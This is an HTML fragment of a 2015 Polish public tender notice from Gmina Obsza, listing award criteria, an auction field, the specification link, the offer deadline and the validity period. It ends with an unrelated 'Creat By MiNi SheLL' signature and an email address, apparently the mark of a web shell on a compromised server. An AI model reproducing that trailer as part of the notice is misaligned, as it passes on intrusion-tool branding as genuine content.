<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 97</li>
<li>2 - Termin płatności - 3</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> https://ugobsza.bip.lubelskie.pl/index.php?id=6<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Obsza
Obsza 36,
23-413 Obsza,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2015 godzina 10:00, miejsce: Gmina Obsza
Obsza 36,
23-413 Obsza,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com